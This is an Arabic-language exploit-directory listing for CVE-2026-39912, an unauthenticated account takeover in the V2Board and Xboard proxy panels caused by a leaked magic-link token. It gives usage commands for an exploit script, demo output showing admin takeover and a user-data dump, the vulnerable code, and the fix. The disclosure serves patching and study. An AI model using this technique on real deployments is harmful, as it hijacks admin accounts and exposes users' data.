Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/chocapikk/cve-2026-39912
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالمصادقة
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board الاستيلاء على الحساب بدون مصادقة - تسريب رمز الرابط السحري (CVE-2026-39912)

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
CVE-2026-39912 — Xboard / V2Board الاستيلاء على الحساب بدون مصادقة - تسريب رمز الرابط السحري (CVE-2026-39912) | Kitploit
الموقع الإلكتروني

CVE-2026-39912 - Xboard / V2Board الاستيلاء على الحساب دون مصادقة

تسريب توكن الرابط السحري في loginWithMailLink

CVECVE-2026-39912
CVSS9.1 (حرجة)
CWECWE-201 (إدراج معلومات حساسة في البيانات المرسلة)
المتأثرV2Board >= 1.6.1 حتى 1.7.4 / Xboard جميع الإصدارات حتى 0.1.9+
الإصلاحلم يُصلَّح بعد (تم التخلي عن V2Board منذ يونيو 2023)
الإفصاح2026-04-09
الفضلValentin Lobstein (Chocapikk)
الشرحchocapikk.com
PRs الإصلاحV2Board #981 / Xboard #873

الخلاصة

يعيد نقطة النهاية loginWithMailLink رابط الدخول السحري مباشرةً في نص استجابة HTTP بدلاً من إرساله عبر البريد الإلكتروني فقط. يمكن لمهاجم غير مصادق يعرف بريدًا إلكترونيًا مسجلًا أن يستولي على أي حساب - بما في ذلك حساب المشرف - عبر طلبي HTTP فقط.

البرمجيات المتأثرة

  • V2Board - لوحة إدارة بروتوكولات البروكسي مفتوحة المصدر (8.7k نجمة، مهجورة)
  • Xboard - نسخة متفرعة من V2Board (أكثر من 4k نجمة، تُصان بنشاط)

كلاهما لوحتان للبروكسي/VPN واسعتا الانتشار، خاصة في الصين. يُظهر ZoomEye أكثر من 7,000 نسخة مكشوفة على الإنترنت.

المتطلبات

  • يجب تفعيل login_with_mail_link_enable في إعدادات المشرف (غير مفعّل افتراضيًا)
  • عنوان بريد إلكتروني مسجل وصالح

الاستخدام

root@kitploit:~
# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 [email protected]

# Save dump to file
python3 exploit.py http://target:7001 [email protected] -o dump.json

عرض تجريبي

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

الثغرة

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token leaked to caller
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork

الإصلاح

root@kitploit:~
- return [true, $link];
+ return [true, true];

المراجع

  • V2Board - الكود المعيب (السطر 71)
  • Xboard - الكود المعيب (السطر 49)
  • الالتزام الأصلي الذي أدخل الثغرة (2022-06-27)
تنزيل الأداة